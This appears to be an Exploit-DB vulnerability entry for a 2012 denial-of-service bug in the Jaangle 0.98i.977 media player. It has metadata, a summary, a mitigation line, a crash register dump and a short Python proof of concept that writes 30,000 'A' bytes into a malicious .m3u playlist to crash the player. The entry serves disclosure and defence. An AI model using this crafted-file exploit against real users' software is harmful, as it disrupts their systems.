jaangle 0.98i.977 Denial of Service Vulnerability

vendor:

Jaangle

by:

hadji samir

7,8

CVSS

HIGH

Denial of Service

119

CWE

Product Name: Jaangle

Affected Version From: 0.98i.977

Affected Version To: 0.98i.977

Patch Exists: YES

Related CWE: N/A

CPE: a:jaangle:jaangle:0.98i.977

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 (fr)

2012

jaangle 0.98i.977 Denial of Service Vulnerability

A buffer overflow vulnerability exists in Jaangle 0.98i.977, which could allow an attacker to cause a denial of service condition. The vulnerability is due to a lack of proper validation of user-supplied input when handling specially crafted .m3u files. An attacker can exploit this vulnerability by creating a malicious .m3u file containing a large amount of data and sending it to the target system. Successful exploitation of this vulnerability could result in a denial of service condition.

Mitigation:

Users should avoid opening files from untrusted sources. Administrators should ensure that the latest security patches are applied to the system.

Source

Exploit-DB raw data:

# jaangle 0.98i.977   Denial of Service Vulnerability
# Author: hadji samir        , s-dz@hotmail.fr
# Download : http://www.jaangle.com/downloading?block
# Tested : Windows 7 (fr)
# DATE   : 2012-12-13
#

################################################################### 
 

EAX 000000C0
ECX 00000000
EDX 00000000
EBX 00000003
ESP 01C5FE28
EBP 01C5FF88
ESI 00000002
EDI 002B4A98
EIP 776964F4 ntdll.KiFastSystemCallRet
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDC000(8000)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00000206 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

#!/usr/bin/python

buff = ("\x41" * 30000 )

f = open("exploit.m3u",'w')
f.write( buff )
f.close()